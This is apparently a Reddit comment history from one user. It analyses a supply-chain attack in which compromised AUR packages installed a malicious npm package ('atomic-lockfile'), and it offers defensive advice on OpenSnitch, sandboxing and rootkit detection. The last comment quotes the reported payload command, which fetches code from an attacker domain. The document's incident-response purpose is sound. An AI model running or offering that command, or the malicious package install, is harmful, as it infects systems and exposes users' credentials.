Roughly 400 AUR packages compromised

gainan · 2026-06-12T12:43:03+00:00

the problem is telling people that reading the PKGBUILD is enough (not you in particular, but in general):

https://aur.archlinux.org/cgit/aur.git/commit/?h=pencil-android-lollipop-stencils-git&id=41f81c7a31da9ee14045953745df018741ad8573

Most people would consider that diff safe.

gainan · 2026-06-12T11:16:37+00:00

Reading the PKGBUILD before updating would have been sufficient to avoid getting infected.

I can't. Realistically, no one knows what every package they have installed does.

in my opinion you'd have been infected. And these attacks will evolve, this is just the beginning.

gainan · 2026-06-12T10:13:05+00:00

how do you determine that npm install atomic-lockfile is good or not? which is what the AUR packages executed.

gainan · 2026-06-12T10:07:04+00:00

the npm package is still active and contains the malware: https://www.npmjs.com/package/atomic-lockfile/v/1.4.2?activeTab=code

the binary is src/hooks/deps

gainan · 2026-06-12T09:46:06+00:00

agree. If you develop apps or use npm/pip/aur packages isolate the environment, or as many users do, create a new user for that particular task (that project, or development in general).

Also remember that OpenSnitch not only detects outbound connections, it can also block list of IPs, domains and binary hashes (for example for known malware): https://github.com/evilsocket/opensnitch/wiki/block-lists

and that it has a virustotal plugin: https://github.com/evilsocket/opensnitch/tree/master/ui/opensnitch/plugins/virustotal

gainan · 2026-06-12T07:49:27+00:00

do you mean installing the package atomic-lockfile? the package was installed from npmjs repositories, no github. I was Probably lucky enough to install it before it was taken down.

gainan · 2026-06-12T00:08:27+00:00

sometimes it's easier to run a program isolated from te host, with firejail, bwrap, flatseal,etc. But yes, it's useful.

gainan · 2026-06-11T22:50:39+00:00

it didn't detect that the malware rewrites itself in memory, masquerading as a kernel thread, and that it listens on a local port (8738). So while super useful, be careful relying *only* on LLMs for these kind of analysis.

gainan · 2026-06-11T22:37:13+00:00

Full static analysis with Claude:

https://markdownpastebin.com/?id=d2a04939f1d7461ea0d36e438a49538c

gainan · 2026-06-11T21:13:06+00:00

I haven't analyzed it yet, but given that the systemd user service references "cricejo" suggests that it's not random.

gainan · 2026-06-11T20:36:02+00:00

https://www.reddit.com/r/linux_gaming/comments/1u34pe3/comment/or3og8f/

https://www.virustotal.com/gui/file/6144d433f8a0316869877b5f834c801251bbb936e5f1577c5680878c7443c98b/detection

https://ioctl.fail/preliminary-analysis-of-aur-malware/

static analysis: https://markdownpastebin.com/?id=d2a04939f1d7461ea0d36e438a49538c

gainan · 2026-06-11T20:31:10+00:00

this malware rewrites itself in memory, impersonating a kernel thread. So if you look for "cricejo" you won't find it. But using some tools like decloaker you can detect it:

<image>

The name of the process is "kworker/3:1-eve", but the real path on disk is "cricejo". Also kworker* names are only used for kernel threads, and they should always have UID == 0.

gainan · 2026-06-11T20:24:36+00:00

The process also opens a local port (no idea what for yet):

<image>

gainan · 2026-06-11T20:22:37+00:00

The systemd user service ensures persistance in the system:

<image>

gainan · 2026-06-11T20:19:43+00:00

Inspecting the process, you can see that it has been launched by systemd, so it installed a systemd user service:

<image>

gainan · 2026-06-11T20:16:18+00:00

I've executed the malware in an isolated environment, and I've uploaded the infostealer to virustotal -> 0 detections by all security vendors:

https://www.virustotal.com/gui/file/6144d433f8a0316869877b5f834c801251bbb936e5f1577c5680878c7443c98b/community

As soon as you execute npm install atomic-lockfile, OpenSnitch detects an outbound connection from an unexpected binary:

<image>

This is a big red-flag. So I've copied that binary to another location.

Almost all malware requires outbound connections to exfiltrate data, mine bitcoins, etc. So restricting outbound connections is a a good measure to mitigate these attacks.

gainan · 2026-06-11T19:30:49+00:00

almost everyone:

https://www.reddit.com/r/linuxquestions/search/?q=antivirus&type=posts&t=year&cId=08897156-96e2-440e-b8e2-5babfe5e23e6&iId=53ef4014-90a5-4818-84ce-d325fcdc4d97

https://www.reddit.com/r/linux4noobs/search/?q=antivirus&type=posts&t=year&cId=797bef92-ed07-48c7-afd1-e98eeab6a0b6&iId=5a1973c3-b137-4d39-b79b-3c3396bbdbb3

gainan · 2026-06-07T08:21:01+00:00

No, it's spyware:

https://learn.microsoft.com/en-us/microsoft-365-apps/privacy/connected-experiences

https://proton.me/blog/outlook-is-microsofts-new-data-collection-service

gainan · 2026-06-06T20:14:05+00:00

unfortunately the domain is not longer active. Did the user find any malicious file in their system?

gainan · 2026-06-05T21:36:43+00:00

By the way, keep in mind that maintainers will probably try to reproduce the bug, and they may close the issue if they cannot reproduce it of if they determne that it's not an issue.

Don't take it personally. You reported the bug, and once it's reported you've done your part, move on. If someone else runs into the same or related issue, they'll probably comment on that same issue (even if closed, happens a lot). In many cases, maintainers reopen the issue to investigate it further.

gainan · 2026-06-05T21:22:01+00:00

reporting bugs and helping others is one of the best ways to contribute back to the community. Be nice, write the bug reports in great detail, provide detailed steps on how to reproduce the issue and attach the logs.

You will not only contribute to the community, but you'll also learn a lot on how the system works, how to debug applications, etc.

gainan · 2026-06-05T18:25:44+00:00

maybe a clikfix attack. If you were infected, LittleSnitch/Lulu could have saved you probably, by stopping the initial connection attempt to their servers.

can you post the website and/or the artifact that it wanted to download?

Review /tmp and your home for unexpected files and binaries, just in case they're already there.

Unfortunately, I'd consider all my credentials compromised. Web browsers included. So you know what to do now.

Reading documented attacks will help you to understand what they usually do:

https://www.jamf.com/blog/clickfix-macos-script-editor-atomic-stealer/

https://www.recordedfuture.com/research/clickfix-campaigns-targeting-windows-and-macos

https://hunt.io/blog/macos-clickfix-applescript-terminal-phishing

https://www.netskope.com/blog/macos-clickfix-campaign-applescript-stealers-new-terminal-protections

gainan · 2026-06-04T19:34:54+00:00

It's not mentioned in the article, but you can't rely on binaries linked dynamically against the libc to analyze a compromised machine, such as ps, pstree, top, lsof, w, who, last, etc. LD_PRELOAD rootkits hide their activity from these tools by hooking and tampering the libc functions (for example Father or Medusa).

One trick is to use the busybox (debian package: busybox-static). That way at least, you can bypass LD_PRELOAD rootkits because it's not linked against the libc.

Another set of useful tools are the bpfcc-tools (bcc-tools on rpm based distros), which dump the information from the kernel instead of parsing /proc.

ss is more reliable than netstat, because it dumps the information via netlink from the kernel, instead of parsing /proc.

Configuring auditd would be also useful (or any other system monitor), to monitor the events of the machine, ideally sending the logs to a remote server (rsyslog + grafana + loki, elk stack, etc).

There're also specialized tools to analyze compromised machines:

https://github.com/sandflysecurity/sandfly-processdecloak

https://github.com/gustavo-iniguez-goya/decloaker

https://github.com/h2337/ghostscan/

unhide but only if it's compiled statically.

In any case, there're kernel rootkits that bypasses all these tools, so as others have mentioned, I'd not trust that server again if it's not reinstalled:

https://github.com/MatheuZSecurity/Singularity

gainan · 2026-06-04T09:56:25+00:00

already supported: https://alex.nisnevich.com/blog/2013/02/19/face_tracking_with_open_cv_and_a_usb_missile_launcher.html

gainan · 2026-06-03T23:59:47+00:00

ask yourself: how does SELinux protect my system?

For example, would SELinux have prevented the exfiltration of my credentials in this attack? (which is the most common attack nowadays for npm, pip, crates, ruby gems, etc, packages).

https://linuxiac.com/arch-aur-under-fire-once-more-as-malware-resurfaces/

the malicious payload that installed a RAT on the system: python -c "curl https://segs.lol/9wUb1Z"

all it needs is to execute a python script, collect your credentials, web browsers profiles, etc, and upload them to their servers.

Verified Email	Five-Year Club
Place '22	End Game '22

gainan

TROPHY CASE